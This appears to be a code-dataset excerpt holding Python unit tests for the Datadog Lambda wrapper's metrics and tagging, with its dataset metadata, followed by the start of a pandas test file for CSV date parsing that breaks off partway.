            raise RuntimeError()

        lambda_event = {}
        with self.assertRaises(RuntimeError):
            lambda_handler(lambda_event, get_mock_context())

        self.mock_write_metric_point_to_stdout.assert_has_calls(
            [
                call(
                    "aws.lambda.enhanced.invocations",
                    1,
                    tags=[
                        "region:us-west-1",
                        "account_id:123457598159",
                        "functionname:python-layer-test",
                        "resource:python-layer-test:1",
                        "cold_start:true",
                        "memorysize:256",
                        "runtime:python2.7",
                        "datadog_lambda:v6.6.6",
                        "dd_lambda_layer:datadog-python27_0.1.0",
                    ],
                    timestamp=None,
                ),
                call(
                    "aws.lambda.enhanced.errors",
                    1,
                    tags=[
                        "region:us-west-1",
                        "account_id:123457598159",
                        "functionname:python-layer-test",
                        "resource:python-layer-test:1",
                        "cold_start:true",
                        "memorysize:256",
                        "runtime:python2.7",
                        "datadog_lambda:v6.6.6",
                        "dd_lambda_layer:datadog-python27_0.1.0",
                    ],
                    timestamp=None,
                ),
            ]
        )

    def test_enhanced_metrics_cold_start_tag(self):
        # First invocation is tagged cold_start:true, the next one false.
        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            lambda_metric("test.metric", 100)

        lambda_event = {}
        lambda_handler(lambda_event, get_mock_context())

        self.mock_is_cold_start.return_value = False

        lambda_handler(
            lambda_event, get_mock_context(aws_request_id="second-request-id")
        )

        self.mock_write_metric_point_to_stdout.assert_has_calls(
            [
                call(
                    "aws.lambda.enhanced.invocations",
                    1,
                    tags=[
                        "region:us-west-1",
                        "account_id:123457598159",
                        "functionname:python-layer-test",
                        "resource:python-layer-test:1",
                        "cold_start:true",
                        "memorysize:256",
                        "runtime:python2.7",
                        "datadog_lambda:v6.6.6",
                        "dd_lambda_layer:datadog-python27_0.1.0",
                    ],
                    timestamp=None,
                ),
                call(
                    "aws.lambda.enhanced.invocations",
                    1,
                    tags=[
                        "region:us-west-1",
                        "account_id:123457598159",
                        "functionname:python-layer-test",
                        "resource:python-layer-test:1",
                        "cold_start:false",
                        "memorysize:256",
                        "runtime:python2.7",
                        "datadog_lambda:v6.6.6",
                        "dd_lambda_layer:datadog-python27_0.1.0",
                    ],
                    timestamp=None,
                ),
            ]
        )

    def test_enhanced_metrics_latest(self):
        # A $Latest ARN is tagged as resource:...:Latest (no dollar sign).
        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            lambda_metric("test.metric", 100)

        lambda_event = {}
        lambda_context = get_mock_context()
        lambda_context.invoked_function_arn = (
            "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:$Latest"
        )
        lambda_handler(lambda_event, lambda_context)

        self.mock_write_metric_point_to_stdout.assert_has_calls(
            [
                call(
                    "aws.lambda.enhanced.invocations",
                    1,
                    tags=[
                        "region:us-west-1",
                        "account_id:123457598159",
                        "functionname:python-layer-test",
                        "resource:python-layer-test:Latest",
                        "cold_start:true",
                        "memorysize:256",
                        "runtime:python2.7",
                        "datadog_lambda:v6.6.6",
                        "dd_lambda_layer:datadog-python27_0.1.0",
                    ],
                    timestamp=None,
                )
            ]
        )

    def test_enhanced_metrics_alias(self):
        # Alias ARNs add an executedversion tag alongside the alias resource.
        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            lambda_metric("test.metric", 100)

        lambda_event = {}
        lambda_context = get_mock_context()
        # tests wouldn't run because line was too long
        alias_arn = "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:My_alias-1"
        lambda_context.invoked_function_arn = alias_arn
        lambda_handler(lambda_event, lambda_context)

        self.mock_write_metric_point_to_stdout.assert_has_calls(
            [
                call(
                    "aws.lambda.enhanced.invocations",
                    1,
                    tags=[
                        "region:us-west-1",
                        "account_id:123457598159",
                        "functionname:python-layer-test",
                        "executedversion:1",
                        "resource:python-layer-test:My_alias-1",
                        "cold_start:true",
                        "memorysize:256",
                        "runtime:python2.7",
                        "datadog_lambda:v6.6.6",
                        "dd_lambda_layer:datadog-python27_0.1.0",
                    ],
                    timestamp=None,
                )
            ]
        )

    def test_no_enhanced_metrics_without_env_var(self):
        # Enhanced metrics are suppressed when DD_ENHANCED_METRICS=false.
        os.environ["DD_ENHANCED_METRICS"] = "false"

        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            raise RuntimeError()

        lambda_event = {}
        with self.assertRaises(RuntimeError):
            lambda_handler(lambda_event, get_mock_context())

        self.mock_write_metric_point_to_stdout.assert_not_called()

        del os.environ["DD_ENHANCED_METRICS"]

    def test_only_one_wrapper_in_use(self):
        patcher = patch("datadog_lambda.wrapper.submit_invocations_metric")
        self.mock_submit_invocations_metric = patcher.start()
        self.addCleanup(patcher.stop)

        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            lambda_metric("test.metric", 100)

        # Turn off _force_wrap to emulate the nested wrapper scenario,
        # the second @datadog_lambda_wrapper should actually be no-op.
        datadog_lambda_wrapper._force_wrap = False
        lambda_handler_double_wrapped = datadog_lambda_wrapper(lambda_handler)

        lambda_event = {}
        lambda_handler_double_wrapped(lambda_event, get_mock_context())

        self.mock_patch_all.assert_called_once()
        self.mock_submit_invocations_metric.assert_called_once()
| 35.954338 | 97 | 0.573025 | import os
import unittest
try:
from unittest.mock import patch, call, ANY, MagicMock
except ImportError:
from mock import patch, call, ANY, MagicMock
from datadog_lambda.wrapper import datadog_lambda_wrapper
from datadog_lambda.metric import lambda_metric
from datadog_lambda.thread_stats_writer import ThreadStatsWriter
def get_mock_context(
aws_request_id="request-id-1",
memory_limit_in_mb="256",
invoked_function_arn="arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:1",
function_version="1",
client_context={},
):
lambda_context = MagicMock()
lambda_context.aws_request_id = aws_request_id
lambda_context.memory_limit_in_mb = memory_limit_in_mb
lambda_context.invoked_function_arn = invoked_function_arn
lambda_context.function_version = function_version
lambda_context.client_context = client_context
return lambda_context
class TestDatadogLambdaWrapper(unittest.TestCase):
def setUp(self):
datadog_lambda_wrapper._force_wrap = True
patcher = patch(
"datadog.threadstats.reporters.HttpReporter.flush_distributions"
)
self.mock_threadstats_flush_distributions = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.extract_dd_trace_context")
self.mock_extract_dd_trace_context = patcher.start()
self.mock_extract_dd_trace_context.return_value = ({}, None)
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.set_correlation_ids")
self.mock_set_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.inject_correlation_ids")
self.mock_inject_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.patch_all")
self.mock_patch_all = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.cold_start.is_cold_start")
self.mock_is_cold_start = patcher.start()
self.mock_is_cold_start.return_value = True
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.python_version_tuple")
self.mock_python_version_tuple = patcher.start()
self.mock_python_version_tuple.return_value = ("2", "7", "10")
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.metric.write_metric_point_to_stdout")
self.mock_write_metric_point_to_stdout = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.get_library_version_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
self.mock_format_dd_lambda_layer_tag.return_value = "datadog_lambda:v6.6.6"
patcher = patch("datadog_lambda.tags._format_dd_lambda_layer_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = (
"dd_lambda_layer:datadog-python27_0.1.0"
)
self.addCleanup(patcher.stop)
def test_datadog_lambda_wrapper(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_handler(lambda_event, lambda_context)
self.mock_threadstats_flush_distributions.assert_has_calls(
[
call(
[
{
"metric": "test.metric",
"points": [[ANY, [100]]],
"type": "distribution",
"host": None,
"device": None,
"tags": ANY,
"interval": 10,
}
]
)
]
)
self.mock_extract_dd_trace_context.assert_called_with(
lambda_event, lambda_context, extractor=None
)
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
self.mock_patch_all.assert_called()
def test_datadog_lambda_wrapper_flush_to_log(self):
os.environ["DD_FLUSH_TO_LOG"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_threadstats_flush_distributions.assert_not_called()
del os.environ["DD_FLUSH_TO_LOG"]
def test_datadog_lambda_wrapper_flush_in_thread(self):
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(True)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 2)
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_not_flush_in_thread(self):
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 0)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_inject_correlation_ids(self):
os.environ["DD_LOGS_INJECTION"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
del os.environ["DD_LOGS_INJECTION"]
def test_invocations_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_errors_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.errors",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_cold_start_tag(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_is_cold_start.return_value = False
lambda_handler(
lambda_event, get_mock_context(aws_request_id="second-request-id")
)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:false",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_latest(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_context.invoked_function_arn = (
"arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:$Latest"
)
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:Latest",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_enhanced_metrics_alias(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
alias_arn = "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:My_alias-1"
lambda_context.invoked_function_arn = alias_arn
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"executedversion:1",
"resource:python-layer-test:My_alias-1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_no_enhanced_metrics_without_env_var(self):
os.environ["DD_ENHANCED_METRICS"] = "false"
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_not_called()
del os.environ["DD_ENHANCED_METRICS"]
def test_only_one_wrapper_in_use(self):
patcher = patch("datadog_lambda.wrapper.submit_invocations_metric")
self.mock_submit_invocations_metric = patcher.start()
self.addCleanup(patcher.stop)
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
# Turn off _force_wrap to emulate the nested wrapper scenario,
# the second @datadog_lambda_wrapper should actually be no-op.
datadog_lambda_wrapper._force_wrap = False
lambda_handler_double_wrapped = datadog_lambda_wrapper(lambda_handler)
lambda_event = {}
lambda_handler_double_wrapped(lambda_event, get_mock_context())
self.mock_patch_all.assert_called_once()
self.mock_submit_invocations_metric.assert_called_once()
| true | true |
f719035a10609454242fe84d548ee0290b6fb04e | 34,201 | py | Python | pandas/tests/io/parser/test_parse_dates.py | sayanmondal2098/pandas | 2f6b90aaaab6814c102eb160c5a9c11bc04a092e | [
"BSD-3-Clause"
] | 1 | 2019-05-19T13:44:03.000Z | 2019-05-19T13:44:03.000Z | pandas/tests/io/parser/test_parse_dates.py | sanjusci/pandas | a1fee9199eba7ebf423880243936b9f1501d3d3a | [
"BSD-3-Clause"
] | null | null | null | pandas/tests/io/parser/test_parse_dates.py | sanjusci/pandas | a1fee9199eba7ebf423880243936b9f1501d3d3a | [
"BSD-3-Clause"
] | 3 | 2018-01-08T08:40:55.000Z | 2019-10-07T02:02:40.000Z | # -*- coding: utf-8 -*-
"""
Tests date parsing functionality for all of the
parsers defined in parsers.py
"""
from datetime import date, datetime
from io import StringIO
import numpy as np
import pytest
import pytz
from pandas._libs.tslib import Timestamp
from pandas._libs.tslibs import parsing
from pandas.compat import lrange, parse_date
from pandas.compat.numpy import np_array_datetime64_compat
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, MultiIndex
from pandas.core.indexes.datetimes import date_range
import pandas.util.testing as tm
import pandas.io.date_converters as conv
import pandas.io.parsers as parsers
def test_separator_date_conflict(all_parsers):
    # Regression test for gh-4678: a "-" thousands separator must not
    # interfere with parsing of the date columns it also appears in.
    parser = all_parsers
    csv_text = "06-02-2013;13:00;1-000.215"

    result = parser.read_csv(
        StringIO(csv_text),
        sep=";",
        thousands="-",
        parse_dates={"Date": [0, 1]},
        header=None,
    )

    expected = DataFrame(
        [[datetime(2013, 6, 2, 13, 0, 0), 1000.215]],
        columns=["Date", 2],
    )
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col_custom(all_parsers, keep_date_col):
    # Merge source columns 1+2 and 1+3 into the "actual" and "nominal"
    # datetime columns via a user-supplied date_parser; keep_date_col
    # controls whether the raw source columns survive in the result.
    data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    parser = all_parsers

    def date_parser(*date_cols):
        """
        Test date parser.

        Parameters
        ----------
        date_cols : args
            The list of data columns to parse.

        Returns
        -------
        parsed : Series
        """
        return parsing.try_parse_dates(parsers._concat_date_cols(date_cols))

    result = parser.read_csv(StringIO(data), header=None,
                             date_parser=date_parser, prefix="X",
                             parse_dates={"actual": [1, 2],
                                          "nominal": [1, 3]},
                             keep_date_col=keep_date_col)
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", "19990127", " 19:00:00", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", "19990127", " 20:00:00", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", "19990127", " 21:00:00", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", "19990127", " 21:00:00", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", "19990127", " 22:00:00", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", "19990127", " 23:00:00", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["actual", "nominal", "X0", "X1", "X2",
                "X3", "X4", "X5", "X6", "X7", "X8"])

    # Raw date columns are dropped unless keep_date_col is set; the Python
    # engine additionally parses the retained X1 column as int64.
    if not keep_date_col:
        expected = expected.drop(["X1", "X2", "X3"], axis=1)
    elif parser.engine == "python":
        expected["X1"] = expected["X1"].astype(np.int64)

    # Python can sometimes be flaky about how
    # the aggregated columns are entered, so
    # this standardizes the order.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col(all_parsers, keep_date_col):
    # Columns 1+2 and 1+3 are combined into datetime columns named after
    # the source column labels ("X1_X2" / "X1_X3"); keep_date_col controls
    # whether the raw pieces survive in the result.
    csv_text = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    parser = all_parsers

    def make_row(first_hm, second_hm, measurements):
        # One expected row: the two combined datetimes, the raw source
        # fields, then the numeric measurement columns.
        fh, fm = first_hm
        sh, sm = second_hm
        return ([datetime(1999, 1, 27, fh, fm),
                 datetime(1999, 1, 27, sh, sm),
                 "KORD", "19990127",
                 " %02d:%02d:00" % (fh, fm),
                 " %02d:%02d:00" % (sh, sm)]
                + list(measurements))

    expected = DataFrame(
        [make_row((19, 0), (18, 56), (0.81, 2.81, 7.2, 0.0, 280.0)),
         make_row((20, 0), (19, 56), (0.01, 2.21, 7.2, 0.0, 260.0)),
         make_row((21, 0), (20, 56), (-0.59, 2.21, 5.7, 0.0, 280.0)),
         make_row((21, 0), (21, 18), (-0.99, 2.01, 3.6, 0.0, 270.0)),
         make_row((22, 0), (21, 56), (-0.59, 1.71, 5.1, 0.0, 290.0)),
         make_row((23, 0), (22, 56), (-0.59, 1.71, 4.6, 0.0, 280.0))],
        columns=["X1_X2", "X1_X3", "X0", "X1", "X2",
                 "X3", "X4", "X5", "X6", "X7", "X8"])

    if keep_date_col:
        # The Python engine parses the retained X1 column as int64.
        if parser.engine == "python":
            expected["X1"] = expected["X1"].astype(np.int64)
    else:
        expected = expected.drop(["X1", "X2", "X3"], axis=1)

    result = parser.read_csv(StringIO(csv_text), header=None, prefix="X",
                             parse_dates=[[1, 2], [1, 3]],
                             keep_date_col=keep_date_col)
    tm.assert_frame_equal(result, expected)
def test_date_col_as_index_col(all_parsers):
    """Parse column 1 as dates while simultaneously using it as the index."""
    data = """\
KORD,19990127 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None, prefix="X",
                             parse_dates=[1], index_col=1)
    # Duplicate 21:00 rows are preserved as duplicate index entries.
    index = Index([datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 20, 0),
                   datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 0),
                   datetime(1999, 1, 27, 22, 0)], name="X1")
    expected = DataFrame([
        ["KORD", " 18:56:00", 0.81, 2.81, 7.2, 0.0, 280.0],
        ["KORD", " 19:56:00", 0.01, 2.21, 7.2, 0.0, 260.0],
        ["KORD", " 20:56:00", -0.59, 2.21, 5.7, 0.0, 280.0],
        ["KORD", " 21:18:00", -0.99, 2.01, 3.6, 0.0, 270.0],
        ["KORD", " 21:56:00", -0.59, 1.71, 5.1, 0.0, 290.0],
    ], columns=["X0", "X2", "X3", "X4", "X5", "X6", "X7"], index=index)
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_int_cast(all_parsers):
    """Combine date/time column pairs into "actual"/"nominal" datetime
    columns via ``conv.parse_date_time``."""
    data = ("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
            "KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
            "KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
            "KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
            "KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
            "KORD,19990127, 23:00:00, 22:56:00, -0.5900")
    parse_dates = {"actual": [1, 2], "nominal": [1, 3]}
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None,
                             date_parser=conv.parse_date_time,
                             parse_dates=parse_dates, prefix="X")
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", 0.81],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", 0.01],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", -0.59],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", -0.99],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", -0.59],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", -0.59],
    ], columns=["actual", "nominal", "X0", "X4"])
    # Python can sometimes be flaky about how
    # the aggregated columns are entered, so
    # this standardizes the order.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
def test_multiple_date_col_timestamp_parse(all_parsers):
    """The combined [0, 1] date column is parsed with the ``Timestamp``
    constructor supplied as ``date_parser``."""
    parser = all_parsers
    data = """05/31/2012,15:30:00.029,1306.25,1,E,0,,1306.25
05/31/2012,15:30:00.029,1306.25,8,E,0,,1306.25"""

    result = parser.read_csv(StringIO(data), parse_dates=[[0, 1]],
                             header=None, date_parser=Timestamp)

    # Both rows carry the same combined timestamp; only column 3 differs.
    stamp = Timestamp("05/31/2012, 15:30:00.029")
    rows = [[stamp, 1306.25, qty, "E", 0, np.nan, 1306.25]
            for qty in (1, 8)]
    expected = DataFrame(rows, columns=["0_1", 2, 3, 4, 5, 6, 7])
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_with_header(all_parsers):
    """With a header row, the combined [1, 2] columns become a "nominal"
    date column placed first; remaining header names are preserved."""
    parser = all_parsers
    data = """\
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000"""
    result = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]})
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "ActualTime", "TDew",
                "TAir", "Windspeed", "Precip", "WindDir"])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,parse_dates,msg", [
    ("""\
date_NominalTime,date,NominalTime
KORD1,19990127, 19:00:00
KORD2,19990127, 20:00:00""", [[1, 2]], ("New date column already "
                                        "in dict date_NominalTime")),
    ("""\
ID,date,nominalTime
KORD,19990127, 19:00:00
KORD,19990127, 20:00:00""", dict(ID=[1, 2]), "Date column ID already in dict")
])
def test_multiple_date_col_name_collision(all_parsers, data, parse_dates, msg):
    """Combining date columns must raise rather than silently clobber an
    existing column of the same name."""
    parser = all_parsers
    with pytest.raises(ValueError, match=msg):
        parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_date_parser_int_bug(all_parsers):
    """A date_parser converting integer POSIX timestamps is applied to the
    index column (gh-3071)."""
    parser = all_parsers
    data = ("posix_timestamp,elapsed,sys,user,queries,query_time,rows,"
            "accountid,userid,contactid,level,silo,method\n"
            "1343103150,0.062353,0,4,6,0.01690,3,"
            "12345,1,-1,3,invoice_InvoiceResource,search\n")
    result = parser.read_csv(
        StringIO(data), index_col=0, parse_dates=[0],
        date_parser=lambda x: datetime.utcfromtimestamp(int(x)))
    expected = DataFrame([[0.062353, 0, 4, 6, 0.01690, 3, 12345, 1, -1,
                           3, "invoice_InvoiceResource", "search"]],
                         columns=["elapsed", "sys", "user", "queries",
                                  "query_time", "rows", "accountid",
                                  "userid", "contactid", "level",
                                  "silo", "method"],
                         index=Index([Timestamp("2012-07-24 04:12:30")],
                                     name="posix_timestamp"))
    tm.assert_frame_equal(result, expected)
def test_nat_parse(all_parsers):
    """NaN/NaT values round-trip through to_csv/read_csv (gh-3062)."""
    parser = all_parsers
    frame = DataFrame({"A": np.arange(10, dtype="float64"),
                       "B": pd.Timestamp("20010101")})
    frame.iloc[3:6, :] = np.nan

    with tm.ensure_clean("__nat_parse_.csv") as path:
        frame.to_csv(path)
        result = parser.read_csv(path, index_col=0, parse_dates=["B"])
        tm.assert_frame_equal(result, frame)
def test_csv_custom_parser(all_parsers):
